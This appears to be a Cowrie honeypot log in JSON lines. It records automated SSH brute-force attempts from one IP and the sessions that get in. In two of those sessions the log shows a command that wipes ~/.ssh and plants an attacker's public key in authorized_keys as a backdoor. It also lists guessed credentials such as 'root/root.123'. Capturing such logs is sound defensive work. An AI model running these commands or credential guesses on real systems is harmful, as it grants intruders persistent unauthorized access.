{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35486,"dst_ip":"1.2.3.4","dst_port":22,"session":"f785982cbc8e","protocol":"ssh","message":"New connection: 212.227.235.229:35486 (1.2.3.4:22) [session: f785982cbc8e]","sensor":"my-vps","timestamp":"2025-09-09T09:55:57.483565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:55:57.497720Z","src_ip":"212.227.235.229","session":"f785982cbc8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:55:57.613732Z","src_ip":"212.227.235.229","session":"f785982cbc8e"}
{"eventid":"cowrie.login.failed","username":"william","password":"qwerty","message":"login attempt [william/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T09:55:58.051489Z","src_ip":"212.227.235.229","session":"f785982cbc8e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:55:59.169609Z","src_ip":"212.227.235.229","session":"f785982cbc8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41986,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d1769b33c1a","protocol":"ssh","message":"New connection: 212.227.235.229:41986 (1.2.3.4:22) [session: 7d1769b33c1a]","sensor":"my-vps","timestamp":"2025-09-09T09:56:03.921723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:03.928953Z","src_ip":"212.227.235.229","session":"7d1769b33c1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:04.207082Z","src_ip":"212.227.235.229","session":"7d1769b33c1a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"!QAZ2wsx3edc","message":"login attempt [ubuntu/!QAZ2wsx3edc] failed","sensor":"my-vps","timestamp":"2025-09-09T09:56:05.323152Z","src_ip":"212.227.235.229","session":"7d1769b33c1a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:06.611165Z","src_ip":"212.227.235.229","session":"7d1769b33c1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42062,"dst_ip":"1.2.3.4","dst_port":22,"session":"631bf5770ef5","protocol":"ssh","message":"New connection: 212.227.235.229:42062 (1.2.3.4:22) [session: 631bf5770ef5]","sensor":"my-vps","timestamp":"2025-09-09T09:56:08.357840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:08.360298Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:08.618940Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.login.success","username":"root","password":"root.123","message":"login attempt [root/root.123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:56:09.700857Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:56:10.562342Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:56:10.565084Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:56:10.566443Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:10.829322Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:56:11.411636Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T09:56:11.413915Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T09:56:11.677591Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:11.678931Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43242,"dst_ip":"1.2.3.4","dst_port":22,"session":"02e58a499bbd","protocol":"ssh","message":"New connection: 212.227.235.229:43242 (1.2.3.4:22) [session: 02e58a499bbd]","sensor":"my-vps","timestamp":"2025-09-09T09:56:11.935249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:11.936676Z","src_ip":"212.227.235.229","session":"02e58a499bbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:12.193474Z","src_ip":"212.227.235.229","session":"02e58a499bbd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T09:56:13.236845Z","src_ip":"212.227.235.229","session":"02e58a499bbd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:14.497455Z","src_ip":"212.227.235.229","session":"02e58a499bbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44264,"dst_ip":"1.2.3.4","dst_port":22,"session":"6268092ab786","protocol":"ssh","message":"New connection: 212.227.235.229:44264 (1.2.3.4:22) [session: 6268092ab786]","sensor":"my-vps","timestamp":"2025-09-09T09:56:14.750321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:14.755233Z","src_ip":"212.227.235.229","session":"6268092ab786"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:15.009230Z","src_ip":"212.227.235.229","session":"6268092ab786"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:56:16.032467Z","src_ip":"212.227.235.229","session":"6268092ab786"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:16.291739Z","src_ip":"212.227.235.229","session":"631bf5770ef5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:16.292830Z","src_ip":"212.227.235.229","session":"6268092ab786"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51803,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2be2115338b","protocol":"telnet","message":"New connection: 212.227.125.160:51803 (1.2.3.4:23) [session: a2be2115338b]","sensor":"my-vps","timestamp":"2025-09-09T09:56:30.954648Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52228,"dst_ip":"1.2.3.4","dst_port":22,"session":"3691ed2e9916","protocol":"ssh","message":"New connection: 212.227.235.229:52228 (1.2.3.4:22) [session: 3691ed2e9916]","sensor":"my-vps","timestamp":"2025-09-09T09:56:46.835743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:46.840975Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:47.126642Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa88888888","message":"login attempt [root/Aa88888888] succeeded","sensor":"my-vps","timestamp":"2025-09-09T09:56:48.282731Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:56:48.864414Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:56:48.866694Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T09:56:48.869111Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:49.150911Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T09:56:49.819362Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T09:56:49.821717Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T09:56:50.105922Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:50.107207Z","src_ip":"212.227.235.229","session":"3691ed2e9916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52520,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d970c403659","protocol":"ssh","message":"New connection: 212.227.235.229:52520 (1.2.3.4:22) [session: 9d970c403659]","sensor":"my-vps","timestamp":"2025-09-09T09:56:50.371842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:50.376032Z","src_ip":"212.227.235.229","session":"9d970c403659"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T09:56:50.648304Z","src_ip":"212.227.235.229","session":"9d970c403659"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T09:56:53.622720Z","src_ip":"212.227.235.229","session":"9d970c403659"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:56:54.899866Z","src_ip":"212.227.235.229","session":"9d970c403659"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52526,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a2cd581bcd9","protocol":"ssh","message":"New connection: 212.227.235.229:52526 (1.2.3.4:22) [session: 9a2cd581bcd9]","sensor":"my-vps","timestamp":"2025-09-09T09:56:55.156753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T09:56:55.157904Z","src_ip":"212.227.235.229","session":"9a2cd581bcd9"}
